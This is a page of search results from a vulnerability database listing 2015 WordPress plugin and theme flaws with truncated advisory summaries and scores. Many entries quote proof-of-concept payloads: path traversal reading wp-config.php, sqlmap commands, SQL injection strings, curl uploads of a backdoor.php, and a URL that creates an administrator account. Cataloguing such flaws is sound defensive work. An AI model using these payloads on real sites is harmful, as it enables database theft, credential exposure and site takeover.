
4359 matches found

wpexploit
added 2015/06/10 12:0 a.m. | 23 views

RobotCPA Plugin V5 - Unauthenticated Local File Inclusion

The robotcpa WordPress plugin was affected by an Unauthenticated Local File Inclusion security vulnerability. This issue has been seen exploited in the wild with the following payload: http://www.example.com/wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php...

CVSS 5 | AI score 0.9 | EPSS 0.12574
Exploits 2 | References 1

wpexploit
added 2015/06/08 12:0 a.m. | 24 views

Easy2Map Photos <= 1.0.9 - SQL Injection

The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input. sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2mimgsavemapname" --cookie=COOKIEHERE --level=5 --risk=3...

CVSS 7.5 | AI score 2 | EPSS 0.02212
Exploits 4 | References 2

wpexploit
added 2015/06/08 12:0 a.m. | 21 views

Easy2Map <= 1.24 - SQL Injection

The Function.php file uses sprintf to format queries being sent to the database, this doesn't provide proper sanitisation of user input or properly parameterises the query. $ sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php'...

CVSS 7.5 | AI score 2.3 | EPSS 0.105
Exploits 5 | References 3

wpexploit
added 2015/06/06 12:0 a.m. | 20 views

SE HTML5 Album Audio Player <= 1.1.0 - Local File Include

The se-html5-album-audio-player v1.1.0 plugin for WordPress has a local file include vulnerability. The downloadaudio.php file does not check whether the user is authenticated; it only attempts to check that the path is in /wp-content/uploads, which is easily defeated with ../...

CVSS 5 | AI score 1.3 | EPSS 0.18958
Exploits 4 | References 4

wpexploit
added 2015/06/02 12:0 a.m. | 16 views

Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)

A reflected XSS in "Simple Share Buttons Adder" before version 6.0.1 led to a reflected cross-site scripting vulnerability on all pages where the "Simple Share Buttons Adder" was added, usually all blog posts. Exploitation required that the browser did not encode the parameters sent to the server...

CVSS 4.3 | AI score 0.5 | EPSS 0.00958
Exploits 1 | References 1

wpexploit
added 2015/05/25 12:0 a.m. | 15 views

Anti-Malware & Brute-Force Security by ELI <= 4.15.22 - Stored XSS

The Anti-Malware and Brute-Force Security by ELI has two issues which we will cover in this report. The first is that no nonce CSRF token is utilized on the settings screen. This could potentially result in resource utilization by performing a large number of scans simultaneously, should an...

AI score 6.4
Exploits 0 | References 1

wpexploit
added 2015/05/25 12:0 a.m. | 16 views

NextScripts: Social Networks Auto-Poster < 3.4.18 - CSRF to Stored XSS

The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery token nonce. If a page with the following FORM in is visited by an administrative...

AI score 0.2
Exploits 0 | References 1

wpexploit
added 2015/05/21 12:0 a.m. | 10 views

Simple Photo Gallery 1.7.8 - Blind SQL Injection

MySQL = 5.0.12 AND time-based blind SELECT sql injection in the galleryid parameter. ./sqlmap.py --dbms=MYSQL --technique T -u http://www.example.com/wordpress/index.php/wppgphotogallery/wppgphotodetails/?galleryid=1&imageid=14...

AI score 1.5
Exploits 0

wpexploit
added 2015/05/15 12:0 a.m. | 15 views

My Calendar <= 2.3.29 - Arbitrary File Override & Reflected XSS

The file override vulnerability allows an admin to override any file on the web server, ignoring settings such as DISALLOWFILEEDIT. Arbitrary File Override ----------------------- POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles Post Data: wpnonceavalidnonce...

AI score 0.4
Exploits 0 | References 1

wpexploit
added 2015/05/15 12:0 a.m. | 13 views

Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS

The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a Multiple Reflected XSS security vulnerability. http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLSmsg=xsstestalert1...

AI score 0.8
Exploits 0 | References 1

wpexploit
added 2015/05/15 12:0 a.m. | 14 views

Visual Form Builder <= 2.8.2 - SQL Injection & Reflected XSS

The Visual Form Builder WordPress plugin was affected by a SQL Injection & Reflected XSS security vulnerability. SQL Injection ------------- http://www.example.com/wp-admin/admin.php?page=visual-form-builder&form-filter=1+or+1%3D2...

AI score 0.6
Exploits 0 | References 1

wpexploit
added 2015/05/14 12:0 a.m. | 27 views

Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)

The jQuery prettyPhoto library bundled with many plugins was found to be vulnerable to DOM Cross-Site Scripting XSS. http://www.example.com/prettyPhotogallery/1,/...

AI score 1.4
Exploits 0 | References 3

wpexploit
added 2015/05/13 12:0 a.m. | 18 views

Syndication Links <= 1.0.2 - DOM Cross-Site Scripting (XSS)

The Syndication Links WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/syndication-links/genericons/example.html...

CVSS 4.3 | AI score 0.9 | EPSS 0.01011
Exploits 2 | References 2

wpexploit
added 2015/05/13 12:0 a.m. | 15 views

Indieweb Post Kinds <= 1.3.1 - DOM Cross-Site Scripting (XSS)

The Post Kinds WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/indieweb-post-kinds/genericons/example.html...

CVSS 4.3 | AI score 0.6 | EPSS 0.00934
Exploits 2 | References 2

wpexploit
added 2015/05/13 12:0 a.m. | 15 views

Media File Manager Advanced <= 1.1.5 - Multiple Vulnerabilities

Media File Manager Advanced suffers from executing administrator actions by any authenticated user due to weak permissions checking. An attacker is able to delete/update posts, Creating/Removing/Listing Directories, Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site Scripting. Pos...

AI score 0.8
Exploits 0 | References 2

wpexploit
added 2015/05/12 12:0 a.m. | 16 views

Auberge Theme <= 1.4.4 - DOM Cross-Site Scripting (XSS)

The Auberge WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/themes/auberge/genericons/example.html...

CVSS 4.3 | AI score 1.2 | EPSS 0.00907
Exploits 1 | References 1

wpexploit
added 2015/05/12 12:0 a.m. | 14 views

Modern Theme <= 1.4.1 - DOM Cross-Site Scripting (XSS)

The Modern WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/themes/modern/genericons/example.html...

CVSS 4.3 | AI score 1 | EPSS 0.00907
Exploits 1 | References 1

wpexploit
added 2015/05/11 12:0 a.m. | 15 views

WordPress 4.1-4.2.1 - Unauthenticated Genericons Cross-Site Scripting (XSS)

Description WordPress 4.1.5 and 4.2.2 removes the Genericons example file which came bundled with the twentyfifteen theme which is vulnerable to DOM based Cross-Site Scripting XSS. http://www.example.com/wp-content/themes/twentyfifteen/genericons/example.html1...

AI score 6.7
Exploits 0 | References 1

wpexploit
added 2015/05/08 12:0 a.m. | 8 views

Yet Another Related Posts Plugin (YARPP) 4.2.4 - CSRF / XSS / RCE

'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed...

AI score 0.1
Exploits 0 | References 3

wpexploit
added 2015/05/07 12:0 a.m. | 18 views

Amazon Product In a Post Plugin - SQL Injection

amazon-product-in-a-post.php - this plugin takes raw user values and uses it delete from the database. This query can be manipulated to perform SQL injection attacks. Line 40: $tempswe = $wpdb-query"DELETE FROM $wpdb-prefixamazoncache WHERE Cacheid ='$wp-queryvars'appip-cache-id'' LIMIT 1;"; sqlm...

Exploits 0 | References 1

wpexploit
added 2015/05/06 12:0 a.m. | 19 views

Freshmail for WordPress <= 1.5.8 - shortcode.php SQL Injection

There is a SQL Injection vulnerability available for collaborators or higher privileged users for webs with freshmail plugin installed. The SQL Injection is located in the attribute "id" of the inserted shortcode FMform id="N". The shortcode attribute "id" is not sanitized before inserting it in ...

CVSS 6.5 | AI score 1 | EPSS 0.02172
Exploits 2 | References 1

wpexploit
added 2015/05/06 12:0 a.m. | 54 views

Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)

Genericons...

AI score 1.1
Exploits 0 | References 1

wpexploit
added 2015/05/06 12:0 a.m. | 13 views

Freshmail for WordPress <= 1.5.8 - Unauthenticated SQL Injection

There is an unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" forms shown to web visitors, in the POST parameter fmformid. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: X-Requested-With: XMLHttpRequest ... Cookie: wordpressf30...

Exploits 0 | References 2

wpexploit
added 2015/05/06 12:0 a.m. | 15 views

Facebook Page Photo Gallery <= 2.0.9 - DOM Cross-Site Scripting (XSS)

The facebook-page-photo-gallery WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotormsg0d/2,/...

AI score 0.8
Exploits 0 | References 1

wpexploit
added 2015/05/06 12:0 a.m. | 238 views

Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)

Genericons...

CVSS 4.3 | AI score 0.9 | EPSS 0.03803
Exploits 3 | References 3

wpexploit
added 2015/05/05 12:0 a.m. | 9 views

WordPress prettyPhoto <= 1.1 - DOM Cross-Site Scripting (XSS)

The WordPress prettyPhoto WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotogallery/1,/...

AI score 0.7
Exploits 0 | References 1

wpexploit
added 2015/05/04 12:0 a.m. | 17 views

Pie Register 2.0.14-2.0.15 - SQL Injection

User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘showdashwidget’ and ‘invitaioncode’ are provided to any page, by any user anonymous or otherwise. import requests,base64,re...

AI score 1.8
Exploits 0 | References 1

wpexploit
added 2015/05/04 12:0 a.m. | 15 views

Pie Register 2.0.14-2.0.15 - Privilege Escalation

User input is not validated correctly when accepting a login request via the Pie Register plugin. It is possible to manipulate posted variables in order to login using an arbitrary User ID such as 1, for the default Administrative account. import requests target="http://localhost" payload =...

AI score 1.9
Exploits 0 | References 1

wpexploit
added 2015/05/03 12:0 a.m. | 18 views

WeeklyNews Premium Theme <= 2.2 - Cross-Site Scripting (XSS)

Vendor confirmed this as fixed in 2.2.9, although the issue was not mentioned in the changelog. http://www.example.com/?s=test"...

CVSS 4.3 | AI score 0.7 | EPSS 0.00934
Exploits 2 | References 1

wpexploit
added 2015/04/29 12:0 a.m. | 40 views

White Label CMS <= 1.5.2 - Stored XSS

Due to a lack of CSRF protection, and lack of sanitation of user input, it is possible to trigger a Persistent XSS attack via a CSRF attack. This attack targets in particular the Import functionality, which is located in the 'wlcmsImport' function, within the file...

AI score 0.3
Exploits 0 | References 1

wpexploit
added 2015/04/28 12:0 a.m. | 21 views

rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection

When initialized, the rtMedia will include and instantiate certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php,’ line 110, i...

AI score 1.3
Exploits 0 | References 1

wpexploit
added 2015/04/26 12:0 a.m. | 16 views

Exquisite Ultimate Newspaper Theme <= 1.3.3 - DOM Cross-Site Scripting (XSS)

The exquisite-wp WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/...

CVSS 4.3 | AI score 1.4 | EPSS 0.01078
Exploits 2 | References 2

wpexploit
added 2015/04/24 12:0 a.m. | 10 views

Premium SEO Pack 1.8.0 - Unauthenticated Arbitrary File Upload & LFD

This plugin is vulnerable to Local File Disclosure and Remote Code Execution via Arbitrary File Upload. BASE64 ENCODED SHELL...

AI score 0.7
Exploits 0 | References 3

wpexploit
added 2015/04/23 12:0 a.m. | 9 views

Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection

Unauthenticated SQL injection in parameter "SingleProduct" when a web visitor explores a product published by the web administrator. This exploit needs magicquotesgpc turned off in the destination server. File Functions/Shortcodes.php line 779 http:///?SingleProduct=2'+and+'a'='a...

AI score 1.3
Exploits 0 | References 3

wpexploit
added 2015/04/23 12:0 a.m. | 13 views

Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection

Unauthenticated SQL injection in ajax call when the plugin is counting the times a product is being seen by the web visitors. The vulnerable POST parameter is "ItemID". Vulnerable code: In file Functions/ProcessAjax.php line 67: ... $ItemID = $POST'ItemID'; $Item = $wpdb-getrow"SELECT ItemViews...

AI score 2.2
Exploits 0 | References 1

wpexploit
added 2015/04/22 12:0 a.m. | 21 views

Ultimate Product Catalogue <= 3.1.1 - Unauthenticated File Upload

By sending a specially-crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary file and execute it in the context of the web server process. curl -v -k -X POST -F "ProductsSpreadsheet=@./backdoor.php"...

AI score 2
Exploits 0 | References 2

wpexploit
added 2015/04/20 12:0 a.m. | 18 views

Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement

The Crayon Syntax Highlighter plugin allows access to the AJAX method 'crayon-theme-editor-save' to any registered user. When called, the AJAX method ‘crayon-theme-editor-save’ will call the 'save' function within the CrayonThemeEditorWP class, defined in...

AI score 1
Exploits 0 | References 1

wpexploit
added 2015/04/17 12:0 a.m. | 16 views

Mashshare <= 2.3.0 - Information Disclosure

The Mashshare plugin exposes a few AJAX commands via its own custom hook, which can be found in the file ‘includes/admin/admin-actions.php’, and the function ‘mashsbprocessactions’. This function is called upon the ‘admininit’ action being fired, which can be triggered by anyone when visiting the...

AI score 0.2
Exploits 0 | References 2

wpexploit
added 2015/04/16 12:0 a.m. | 13 views

WP-Mon - Arbitrary File Download

The wp-mon WordPress plugin was affected by an Arbitrary File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php...

AI score 1.4
Exploits 0 | References 1

wpexploit
added 2015/04/15 12:0 a.m. | 7 views

Ajax Store Locator <= 1.2 - Remote SQL Injection

The ajax-store-locator WordPress plugin was affected by a Remote SQL Injection security vulnerability. http://www.example.com/wordpress/wp-admin/admin-ajax.php?action=sldalsearchlocation&funMethod=SearchStore&Location=Social&StoreLocation=11 AND SELECT FROM SELECTSLEEP10LCKZ...

AI score 1.8
Exploits 0 | References 3

wpexploit
added 2015/04/14 12:0 a.m. | 19 views

Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure

The local file syntax highlighting feature of Crayon Syntax Highlighter doesn't check the path of the file to process. Also, by default, this feature is usable through public comments. This allows unauthenticated visitors to see the content of any file where the web server has read permissions,...

AI score 7.2
Exploits 0 | References 1

wpexploit
added 2015/04/14 12:0 a.m. | 16 views

Tune Library <= 1.5.4 - SQL Injection

The Tune Library WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/?pageid=2&artistletter=G' UNION ALL SELECT CONCATWSCHAR59,version,currentuser,database,2--%20...

CVSS 6.8 | AI score 1.3 | EPSS 0.04868
Exploits 6 | References 4

wpexploit
added 2015/04/13 12:0 a.m. | 16 views

WP Mobile Edition <= 2.2.7 - Remote File Disclosure

The plugin is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php' http://www.example.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php...

AI score 1.5
Exploits 0 | References 1

wpexploit
added 2015/04/13 12:0 a.m. | 9 views

WordPress Video Gallery <= 2.8 - SQL Injection

Note: The vendor patched the issue but did not change the version number. Using fixed in version 2.8.1 for detection reasons although in reality this version does not exist at the time of writing. http://www.example.com/wp-admin/admin-ajax.php?action=googleadsense&vid=SQLi...

AI score 2.4
Exploits 0 | References 3

wpexploit
added 2015/04/12 12:0 a.m. | 14 views

N-Media Website Contact Form with File Upload <= 1.3.4 - Arbitrary File Upload

The "uploadfile" ajax function is affected by an unrestricted file upload vulnerability. curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nmwebcontactuploadfile" http://www.example.com/wp-admin/admin-ajax.php Response:...

AI score 1.1
Exploits 0 | References 4

wpexploit
added 2015/04/10 12:0 a.m. | 17 views

Fusion Engage 1.0.5 - Local File Disclosure

The fusion-engage WordPress plugin was affected by a Local File Disclosure security vulnerability. curl --data "action=fegetsvhtml&video=../wp-config.php" "http://www.example.com/wp-admin/admin-ajax.php";...

AI score 0.3
Exploits 0 | References 2

wpexploit
added 2015/04/10 12:0 a.m. | 9 views

Duplicator <= 0.5.14 - SQL Injection & CSRF

An authorised user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin CSRF. http://www.example.com/wp-admin/admin-ajax.php?action=duplicatorpackagedelete PO...

AI score 2.9
Exploits 0 | References 3

wpexploit
added 2015/04/07 12:0 a.m. | 21 views

All In One WP Security & Firewall <= 3.9.0 - Blind SQL Injection

There are some pages which use the WordPress escsql function incorrectly. http://www.example.com/wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=userid,select from selectsleep30a&order=asc...

CVSS 7.5 | AI score 1.3 | EPSS 0.01869
Exploits 1 | References 3

wpexploit
added 2015/04/06 12:0 a.m. | 10 views

QAEngine Theme - Privilege Escalation

QAEngine vulnerability allows an attacker to have an administrator account on the target's website. http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&userlogin=xADMIN&userpass=xPASS&role=administrator...

AI score 3.6
Exploits 0 | References 2

wpexploit
added 2015/03/31 12:0 a.m. | 8 views

SP Project & Document Manager <= 2.5.3 - Blind SQL Injection

The SP Project & Document Manager WordPress plugin was affected by a Blind SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=SQLi...

AI score 1.2
Exploits 0 | References 1

Total number of security vulnerabilities: 4359